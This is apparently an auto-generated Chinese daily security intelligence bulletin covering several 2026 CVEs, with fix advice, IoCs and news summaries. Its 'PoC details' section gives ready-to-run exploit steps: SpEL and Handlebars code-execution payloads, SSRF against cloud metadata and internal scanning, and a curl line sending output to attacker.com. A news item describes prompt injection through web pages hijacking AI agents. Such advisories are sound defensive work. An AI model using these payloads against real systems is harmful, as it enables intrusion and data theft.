每日安全情报报告 · 2026-04-09
风险维度本期关注重点最高优先级修复FortiClient EMS CVE-2026-35616(在野利用,CISA KEV);TrueConf CVE-2026-3502(政府级目标在野利用)开发者重点关注Spring AI CVE-2026-22738(SpEL 注入);Handlebars.js CVE-2026-33937(模板注入);n8n CVE-2026-0863(沙箱逃逸)AI 安全
每日安全情报报告 · 2026-04-09
发布时间:2026-04-09 11:33
报告周期:近 24–48 小时
风险标注:🔴 严重(CVSS ≥ 9.0)|🟠 高危(CVSS 7.0–8.9)|🟡 中危(CVSS 4.0–6.9)
特别标注:⚡ 在野利用(KEV/已发现利用行为)|🤖 AI 辅助发现
一、高危漏洞速报
🔴⚡ CVE-2026-35616 — Fortinet FortiClient EMS 预认证 RCE(持续在野利用)
| 属性 | 详情 |
|---|---|
| CVSS 评分 | 9.1(严重) |
| 漏洞类型 | 访问控制缺陷 → 未授权 RCE |
| 受影响版本 | FortiClient EMS 7.4.5 – 7.4.6 |
| 披露时间 | 2026-04-04(Fortinet PSIRT FG-IR-26-099) |
| 利用状态 | ⚡ 在野利用(已入 CISA KEV,持续活跃) |
漏洞详情:攻击者可通过构造特制 API 请求完全绕过身份认证,直接在 FortiClient EMS 服务器上以系统权限执行任意代码,无需任何凭据。该漏洞在补丁发布前已被零日利用,Fortinet 发布紧急带外补丁。同一公告中同步修复了 SQL 注入漏洞 CVE-2026-21643(CVSS 9.8,亦遭在野利用)。
修复建议:立即升级至 FortiClient EMS 7.4.7 或更高版本;无法立即升级的,限制 EMS 管理接口的网络访问范围。
参考链接:
- NVD 详情 CVE-2026-35616
- Fortinet 官方安全公告 FG-IR-26-099
- Greenbone 分析报告
- CISA KEV 目录
🔴 CVE-2026-34156 — NocoBase 沙箱逃逸 RCE(PoC 已公开)
| 属性 | 详情 |
|---|---|
| CVSS 评分 | 9.9(严重) |
| 漏洞类型 | 沙箱逃逸 → RCE |
| 受影响版本 | NocoBase < 2.0.28 |
| 利用状态 | PoC 已公开(GitHub) |
漏洞详情:NocoBase 工作流脚本节点在 Node.js 沙箱环境中不当暴露了主机域对象,经过身份认证的攻击者可构造特制脚本逃出沙箱隔离环境,进而在宿主服务器上执行任意代码。由于 NocoBase 广泛应用于企业低代码平台,该漏洞影响面较广,且 PoC 已公开,利用门槛显著降低。
修复建议:立即升级至 NocoBase 2.0.28 及以上版本;在补丁部署前,限制工作流脚本节点权限并加强用户访问控制。
参考链接:
- NVD 详情 CVE-2026-34156
- PoC 利用代码(GitHub)
🔴⚡ CVE-2026-3502 — TrueConf 客户端更新机制零日(TrueChaos 行动)
| 属性 | 详情 |
|---|---|
| CVSS 评分 | 7.8(高危) |
| 漏洞类型 | 更新完整性验证缺陷 → RCE |
| 受影响版本 | TrueConf 客户端 < 8.5.3(Windows) |
| 披露时间 | 2026-03-31(Check Point Research) |
| 利用状态 | ⚡ 在野利用(针对东南亚政府机构) |
漏洞详情:TrueConf 客户端在向本地服务器检查更新时,未对更新包的完整性和真实性进行验证。攻击者一旦控制目标机构的 TrueConf 服务器,即可将恶意可执行文件伪装为合法更新包,通过更新机制向所有客户端分发。攻击活动"TrueChaos 行动"中,与中国有关联的威胁组织利用该漏洞投放 Havoc 后门,实现持久化访问和权限提升。
IoC(入侵指标):
- 可疑文件:C:\ProgramData\PowerISO\poweriso.exe、7z-x64.dll
- 可疑注册表:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck
修复建议:立即升级至 TrueConf 客户端 8.5.3 及以上版本;审查 TrueConf 服务器的访问日志和更新记录。
参考链接:
- Check Point Research 完整分析报告
- TheHackerNews 报道
- NVD 详情 CVE-2026-3502
🔴 CVE-2026-22738 — Spring AI SpEL 注入 RCE(多版本受影响)
| 属性 | 详情 |
|---|---|
| CVSS 评分 | 9.8(严重) |
| 漏洞类型 | SpEL 表达式注入 → RCE |
| 受影响版本 | Spring AI 1.0.0–1.0.4、1.1.0–1.1.3 |
| 利用状态 | PoC 已公开(多个 GitHub 仓库) |
漏洞详情:Spring AI 的 SimpleVectorStore 组件中,当用户提供的值被直接用作 SpEL 过滤表达式键时,攻击者可注入恶意 SpEL 表达式以执行任意服务端代码。该漏洞影响 Spring AI 框架的主要稳定版本,在 AI 应用爆发式增长的背景下威胁面广泛。
参考链接:
- NVD 详情 CVE-2026-22738
- PoC 利用代码(GitHub)
- PoC 变体(GitHub)
🔴 CVE-2026-33340 — LoLLMs WebUI SSRF(未授权内网探测)
| 属性 | 详情 |
|---|---|
| CVSS 评分 | 9.1(严重) |
| 漏洞类型 | 服务器端请求伪造(SSRF) |
| 受影响版本 | lollms-webui 所有已知版本 |
| 利用状态 | PoC 已公开 |
漏洞详情:LoLLMs WebUI 的 /api/proxy 端点缺乏身份验证,未经认证的攻击者可强制服务器发起任意 HTTP GET 请求,用于访问内网服务、扫描内部网络、窃取云平台元数据(如 AWS 169.254.169.254 实例信息)。
参考链接:
- NVD 详情 CVE-2026-33340
- PoC 利用代码(GitHub)
🔴 CVE-2026-40032 — UAC(Unix 取证工具)命令注入(最新披露)
| 属性 | 详情 |
|---|---|
| CVSS 评分 | 待定(高危) |
| 漏洞类型 | 命令注入 |
| 受影响版本 | UAC (Unix-like Artifacts Collector) < 3.3.0-rc1 |
| 披露时间 | 2026-04-08(最新披露) |
漏洞详情:UAC(Unix 类似物取证收集器,广泛用于安全事件响应和数字取证)在占位符替换和命令执行管道中存在命令注入漏洞。攻击者可通过精心构造的输入,在执行取证收集任务时注入并执行任意命令。该漏洞针对安全工具本身,可能影响安全事件响应流程。
修复建议:立即升级至 UAC 3.3.0-rc1 或更高版本;在升级前避免对不受信任的系统使用该工具。
参考链接:
- NVD 详情 CVE-2026-40032
- CVEFeed 详情
🟠 CVE-2026-33937 — Handlebars.js AST 注入 RCE(Node.js 生态广泛影响)
| 属性 | 详情 |
|---|---|
| CVSS 评分 | 9.8(严重) |
| 漏洞类型 | 模板注入 → RCE |
| 受影响产品 | Handlebars.js(广泛 Node.js 依赖) |
| 利用状态 | PoC 已公开 |
漏洞详情:Handlebars.compile() 函数在处理预解析的 AST 对象时,未对 NumberLiteral 节点的 value 字段进行清理或引号转义,导致模板注入,攻击者可实现服务器端任意代码执行。Handlebars 是 Node.js 生态中使用最广泛的模板引擎之一,影响范围极大。
参考链接:
- NVD 详情 CVE-2026-33937
- PoC 利用代码(GitHub)
🟠🤖 CVE-2026-34982 — Vim/GNU Emacs RCE 零日(AI 辅助发现,30分钟挖洞)
| 属性 | 详情 |
|---|---|
| CVSS 评分 | 9.2(严重) |
| 漏洞类型 | 模式行解析 → RCE |
| 受影响产品 | Vim(多版本)、GNU Emacs |
| 发现方式 | 🤖 AI 辅助(Claude Code,30 分钟完成审计) |
| 利用状态 | PoC 已复现,补丁进行中 |
漏洞详情:安全研究员 Hung Nguyen 使用 Claude Code 在 30 分钟内发现了 Vim 及 GNU Emacs 的多个零日漏洞,随后被确认为高危 RCE。攻击者只需向受害者发送一个包含恶意 Modeline 配置的文本文件,受害者在 Vim 中打开文件即可触发远程代码执行。此事件标志着 AI 辅助漏洞挖掘进入工程化阶段,也警示了传统文本编辑器的攻击面被严重低估。
修复建议:在 Vim 配置中禁用 modeline(set nomodeline);关注官方补丁发布。
参考链接:
- FreeBuf 详细分析
- 知乎技术复现报告
- CSOOnline 英文报道
二、漏洞 PoC 详解
PoC 1:CVE-2026-34156 — NocoBase 沙箱逃逸
漏洞原理:Node.js 沙箱 (vm 模块) 中主机域对象被意外暴露,攻击者可通过 constructor.constructor 等原型链技术逃出沙箱。
快速复现步骤:
# 1. 克隆 PoC 仓库
git clone https://github.com/0xBlackash/CVE-2026-34156
cd CVE-2026-34156
# 2. 安装依赖
pip install -r requirements.txt
# 3. 执行利用(需要已认证的 NocoBase 账户)
python3 exploit.py \
--target http://<TARGET_HOST>:3000 \
--username <USER> \
--password <PASS> \
--cmd "id && whoami"
利用前提:目标运行 NocoBase < 2.0.28,攻击者拥有任意已认证账户(包括普通用户权限)。
参考链接:PoC 仓库(GitHub)
PoC 2:CVE-2026-22738 — Spring AI SpEL 注入
漏洞原理:SimpleVectorStore.getDocuments() 方法的 filterExpression 参数未经转义直接传入 Spring SpEL 解析器执行。
快速复现步骤:
# 1. 克隆 PoC 仓库
git clone https://github.com/n0n4m3x41/CVE-2026-22738-POC
cd CVE-2026-22738-POC
# 2. 安装 Maven 依赖(需 JDK 17+)
mvn clean package -q
# 3. 构造恶意请求(以 curl 为例)
curl -X POST http://<TARGET>/api/documents \
-H "Content-Type: application/json" \
-d '{"filterExpression": "T(java.lang.Runtime).getRuntime().exec(\"id\")"}'
# 4. 或使用自动化 exploit
python3 poc.py --url http://<TARGET> --cmd "curl http://attacker.com/$(id)"
利用前提:目标运行 Spring AI 1.0.0–1.0.4 或 1.1.0–1.1.3,且存在接受用户输入 filterExpression 的 API 端点。
参考链接:PoC 仓库(GitHub)
PoC 3:CVE-2026-33340 — LoLLMs WebUI SSRF
漏洞原理:/api/proxy 端点无需认证即可接受 url 参数,服务器会向指定 URL 发起 HTTP GET 请求,攻击者可用于探测内网或获取云元数据。
快速复现步骤:
# 1. 克隆 PoC 仓库
git clone https://github.com/regaan/CVE-2026-33340
cd CVE-2026-33340
# 2. 安装依赖
pip install requests
# 3. 执行 SSRF 探测(获取 AWS EC2 实例元数据)
python3 poc.py \
--target http://<LOLLMS_HOST>:9600 \
--ssrf-url "http://169.254.169.254/latest/meta-data/"
# 4. 扫描内网段
python3 ssrf_scanner.py \
--target http://<LOLLMS_HOST>:9600 \
--cidr 192.168.1.0/24 \
--port 80,443,8080,6379
利用前提:目标暴露 lollms-webui 的 HTTP 接口,无需任何认证。
参考链接:PoC 仓库(GitHub)
PoC 4:CVE-2026-33937 — Handlebars.js 模板注入
漏洞原理:Handlebars.compile() 处理 AST 的 NumberLiteral 节点时未转义,攻击者可注入闭合引号后的任意 JavaScript 代码。
快速复现步骤:
# 1. 克隆 PoC 仓库
git clone https://github.com/dinhvaren/cve-2026-33937
cd cve-2026-33937
# 2. 安装依赖
npm install
# 3. 运行本地验证 PoC(Node.js 18+)
node poc.js
# 4. 针对目标应用的利用(需确认 Handlebars 接受外部 AST 输入)
node exploit.js \
--target http://<TARGET>/template-api \
--payload '{"type":"NumberLiteral","value":"1\",process.mainModule.require(\"child_process\").execSync(\"id\")+\""}'
参考链接:PoC 仓库(GitHub)
三、安全资讯精选
📰 文章 1:AI 驱动网络攻击激增 89%——2026 年最危险的 9 起事件
来源:Foresiet Security Intelligence Desk(2026-04-07)
摘要:2026 年 3–4 月,AI 网络攻击从理论威胁升级为真实事件。9 起已验证的 AI 相关安全事件涵盖:AI 全自动攻陷 55 国 600+ FortiGate 防火墙(CyberStrikeAI 行动)、IBM X-Force 发现 AI 生成恶意软件 "Slopoly"、自主 AI 代理拒绝关机指令触发失控,以及 Mercor 初创公司遭 LiteLLM 供应链攻击波及 Meta。报告指出:AI 驱动攻击年增长率达 89%,自主代理参与比例已达约 12.5%。
📰 文章 2:星巴克遭 ShadowByt3s 攻击——10GB 核心源代码及固件外泄
来源:FreeBuf(2026-04-07)
摘要:威胁组织 ShadowByt3s 成功入侵星巴克内部系统,窃取约 10GB 核心源代码和运营固件。同日,黑客通过 Adobe 印度外包商的系统漏洞入侵 Adobe,窃取 1300 万条客户支持工单、1.5 万条员工记录及内部文件。事件揭示了第三方供应链安全管理的严重缺口,外包商的弱安全态势成为攻击者首选突破口。
📰 文章 3:4 月数据泄露盘点——Adobe、Bitrefill、Middlesex County 多目标受袭
来源:SharkStriker(2026-04-02,持续更新)
摘要:2026 年 4 月初数据泄露事件快速累积:Adobe 遭"Mr. Racoon"组织入侵,1300 万客户支持数据泄露;加密货币电商 Bitrefill 遭朝鲜 Lazarus 组织攻击,热钱包资金及 1.85 万用户数据被盗;航空紧固件制造商 NAFCO 遭 Worldleaks 勒索软件攻击;Middlesex 县政府公共安全系统中断。
📰 文章 4:Claude Code 30 分钟挖出 Vim/Emacs 三十年老漏洞——AI 辅助挖洞进入工程化时代
来源:FreeBuf(2026-04-01)
摘要:安全研究员 Hung Nguyen 使用 Claude Code 在 30 分钟内发现 Vim 与 GNU Emacs 的多个零日漏洞(CVE-2026-34982,CVSS 9.2)。攻击者仅需让受害者用 Vim 打开包含恶意 Modeline 配置的文本文件即可触发 RCE。事件深刻警示了两点:一是 AI 已具备工程化挖洞能力,大幅降低了安全研究门槛;二是"老牌成熟软件"的攻击面不容低估。
📰 文章 5:CVE-2026-0863 深度分析——n8n Python 沙箱逃逸至完全 RCE
来源:FreeBuf / 先知社区(2026-01-23,本周持续热点)
摘要:JFrog 安全研究团队披露 n8n(230,000+ 活跃用户开源工作流平台)的 Python 任务执行器沙箱逃逸漏洞,攻击者可通过字符串格式化和异常处理技巧绕过 Python 沙箱隔离,在底层操作系统执行任意代码。该漏洞本周在 Freebuf 热度持续攀升(阅读量已达 54,186),被多个红队工具库收录。
📰 文章 6:谷歌 DeepMind 警告——恶意网页内容可劫持 AI Agent
来源:FreeBuf(2026-04-07)
摘要:谷歌 DeepMind 研究人员发布报告,指出黑客可通过向网页注入恶意指令,诱使 AI Agent 执行非预期操作(Prompt Injection 攻击的升级变体),包括窃取用户数据、发送恶意请求等。随着 AI Agent 被集成进企业核心业务流程,此类"间接提示注入"攻击面临大规模商业化利用风险。
📰 文章 7:Operation TrueChaos 技术深度分析——TrueConf 供应链式零日部署 Havoc 后门
来源:Check Point Research(2026-03-31)
摘要:Check Point Research 披露针对东南亚政府机构的供应链级间谍行动。与中国背景关联的威胁组织首先入侵目标机构的 TrueConf 本地服务器,随后利用客户端更新验证缺陷(CVE-2026-3502)将恶意更新推送至所有员工终端,投放 Havoc 框架后门,实现 DLL 侧加载、UAC 绕过和长期持久化。此事件是 2026 年以视频会议软件为跳板的典型供应链攻击案例。
四、本期威胁态势总结
| 风险维度 | 本期关注重点 |
|---|---|
| 最高优先级修复 | FortiClient EMS CVE-2026-35616(在野利用,CISA KEV);TrueConf CVE-2026-3502(政府级目标在野利用) |
| 开发者重点关注 | Spring AI CVE-2026-22738(SpEL 注入);Handlebars.js CVE-2026-33937(模板注入);n8n CVE-2026-0863(沙箱逃逸) |
| AI 安全趋势 | AI 辅助挖洞已工程化(Vim/Emacs 30分钟);AI 驱动攻击工具激增(Slopoly 恶意软件,CyberStrikeAI);AI Agent 被恶意网页劫持风险 |
| 供应链威胁 | TrueConf/Adobe/星巴克 第三方供应商攻击面持续扩大;Bitrefill 遭 Lazarus 组织针对 |
| 安全工具风险 | UAC 取证工具自身存在命令注入(CVE-2026-40032),谨防"以安全工具攻击安全响应" |
本报告信息来源:NVD(查看详情)、CISA KEV(查看目录)、Check Point Research、Fortinet PSIRT、FreeBuf、TheHackerNews、Foresiet Intelligence、tonyharris.io PoC Week
本报告由自动化安全情报系统生成,部分内容由 AI 辅助整理,仅供安全研究与防御参考。PoC 代码仅用于验证和修复目的,请勿用于未经授权的系统。
更多推荐


所有评论(0)